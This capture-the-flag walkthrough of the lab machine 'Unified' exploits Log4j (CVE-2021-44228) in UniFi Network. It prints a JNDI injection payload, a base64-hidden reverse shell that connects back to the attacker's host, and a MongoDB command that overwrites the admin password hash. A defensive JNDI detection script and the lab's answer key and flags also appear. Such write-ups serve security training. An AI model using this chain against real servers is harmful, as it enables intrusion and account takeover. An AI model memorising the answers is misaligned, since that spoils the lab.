Target drone: Unified
Task1
Question: What are the first four open ports?
22,6789,8080,8443
Scan with nmap
Task2
Question: What is the title of the software running on port 8443?
UniFi Network
Scan again with nmap
nmap -sV -v -sC -p 8443 --min-rate 1000 10.129.96.149
Task3
Question: What version of the software is running?
6.4.54
From the nmap scan results we know there is an HTTP service on port 8080.
Visit it in the browser to get the version.
Task4
Question: What is the CVE of the identified vulnerability?
CVE-2021-44228
Search online for known vulnerabilities in this version.
5-14 Problem solving process
This version is affected by the Log4j vulnerability. We capture the POST request to /api/login
and craft the following body
to verify whether the Log4j JNDI lookup is triggered by our payload:
{
"username":"1",
"password":"1",
"remember":"${jndi:ldap://10.10.14.212/whatever}",
"strict":true
}
LDAP (Lightweight Directory Access Protocol) uses port 389 by default. If the vulnerability exists, the target will process the payload and send an LDAP request to port 389 on our machine.
Let's set up a listener:
sudo tcpdump -i tun0 port 389
Note: tcpdump is a command-line packet capture program, similar to Wireshark, that can intercept traffic on an interface.
The capture succeeds: the target host connects from its port 37900 to our local LDAP port, confirming the vulnerability.
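On the defender's side, the same request is what a WAF or log pipeline should catch. The following is an added example, not code from the original write-up: it scans JSON login bodies (modelled on the /api/login POST above, with constructed sample requests and RFC 5737 source addresses) for JNDI lookup strings in any field, nested or not, and extracts the callback host so the request can be blocked and alerted on.

```python
import json
import re

# Matches a Log4j lookup of the form ${jndi:<scheme>://host[:port]/...}
# and captures the scheme and the callback host (with port, if any).
JNDI_RE = re.compile(r"\$\{jndi:([a-z]+)://([^\s/}]+)", re.IGNORECASE)

# Constructed sample traffic: (source IP, raw request body).
SAMPLE_REQUESTS = [
    ("203.0.113.7", '{"username":"1","password":"1",'
                    '"remember":"${jndi:ldap://10.10.14.212/whatever}","strict":true}'),
    ("198.51.100.5", '{"username":"alice","password":"hunter2","remember":true,"strict":true}'),
    ("203.0.113.7", '{"username":"${JNDI:ldap://10.10.14.212:1389/a}","password":"x"}'),
    ("198.51.100.9", 'not json at all ${jndi:ldap://ldap.example.invalid/x}'),
]

def walk_strings(value, path=""):
    """Yield (json_path, string) for every string nested anywhere in a JSON value."""
    if isinstance(value, str):
        yield path, value
    elif isinstance(value, dict):
        for k, v in value.items():
            yield from walk_strings(v, f"{path}.{k}" if path else k)
    elif isinstance(value, list):
        for i, v in enumerate(value):
            yield from walk_strings(v, f"{path}[{i}]")

def find_jndi_lookups(body):
    """Return [(field, scheme, callback_host)] for every JNDI lookup in a request body.
    Bodies that are not valid JSON are scanned as one raw string (field "<raw>")."""
    try:
        doc = json.loads(body)
    except ValueError:
        doc = body
    hits = []
    for field, text in walk_strings(doc):
        for m in JNDI_RE.finditer(text):
            hits.append((field or "<raw>", m.group(1).lower(), m.group(2)))
    return hits

def alerts_for(requests):
    """Build one alert per request that carries a JNDI lookup, keyed by source IP."""
    return [{"src": src, "hits": find_jndi_lookups(body)}
            for src, body in requests if find_jndi_lookups(body)]

if __name__ == "__main__":
    for alert in alerts_for(SAMPLE_REQUESTS):
        print(alert)
```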
The tool preparation is as follows.
Tools to prepare:
openjdk-11-jdk
sudo apt-get install openjdk-11-jdk -y
Maven
sudo apt-get install maven -y
Build with Maven
git clone https://github.com/veracode-research/rogue-jndi
cd rogue-jndi
// Switch to the Aliyun mirror here, otherwise the download is very slow
mvn package
Then prepare the reverse shell.
Execute the following command:
java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMTIvMTAyOCAwPiYxJw==}|{base64,-d}|{bash,-i}" --hostname "10.10.14.212"
Then start the listener and send the request from bp (Burp Suite).
The reverse shell is received successfully.
Then find the user's flag first
Check the MongoDB port status:
ps aux | grep mongo
In the output, the line bin/mongod --dbpath /usr/lib/unifi/data/db --port 27117 --unixSocketPrefix /usr/lib/unifi/run --logRotate reopen --logappend --logpath /usr/lib/unifi/logs/mongod.log --pidfilepath /usr/lib/unifi/run/mongod.pid --bind_ip 127.0.0.1 is the running command with its arguments, which shows that MongoDB listens on port 27117 (bound to localhost only).
Try to read the administrator password: the default database of the UniFi application is ace, so query the admin collection.
mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);"
Note: the --eval parameter runs the given JavaScript in the mongo shell.
The output shows the administrator account and its password hash.
x_shadow is the password hash: the $6$ prefix means SHA-512 crypt, followed by a 16-character salt and then the hash itself.
A hash starting with $6$ was produced with SHA-512;
starting with $1$, with MD5;
starting with $2$, with Blowfish;
starting with $5$, with SHA-256. An asterisk means the account is locked.
PS: this notation is the one used in the Linux shadow file.
Of course, you can also use the tool hashid to identify the hash type directly; it reports sha512.
Because it is a hash, it cannot be reversed, so the only option is the replacement method.
Replace the administrator hash in MongoDB with the SHA-512 hash of a password we choose (here admin).
Using NoSQL syntax, the update is as follows:
mongo --port 27117 ace --eval 'db.admin.update({"_id": ObjectId("61ce278f46e0fb0012d47ee4")},{$set:{"x_shadow":"$6$jaYBW0iCZNXzIuZk$FtGH/we0.hTsf63jTv6fh3sgcPP/J0uIXKXp0ADNWelcqW0ykcTiwnkvI.YePmnRpYMKZ24cqsSCxxg2RtBBs1"}})'
Query again and you will find that the hash has been changed to the one we set (password admin).
We log in directly to the web interface; in the settings we find that SSH is enabled and the root password is shown there.
The SSH connection succeeds.
Continue and get the root flag.
Task5
Question: What protocol does JNDI utilize in injection?
ldap
Task6
Question: What tools do we use to intercept traffic, indicating a successful attack?
tcpdump
Task7
Question: Which port do we need to intercept traffic transmission?
389
Task8
Question: On which port is the MongoDB service running?
27117
Task9
Question: What is the default database name for UniFi applications?
ace
Task 10
Question: In MongoDB, what is the function we use to enumerate the users in the database?
db.admin.find()
Task11
Question: In MongoDB, what is the function we use to update a user in the database?
db.admin.update()
Task12
Question: What is the root password?
NotACrackablePassword4U2022
Submit user flag
6ced1a6a89e666c0620cdb10262ba127
Submit root flag
e50bc93c75b634e4b272d2f771c33681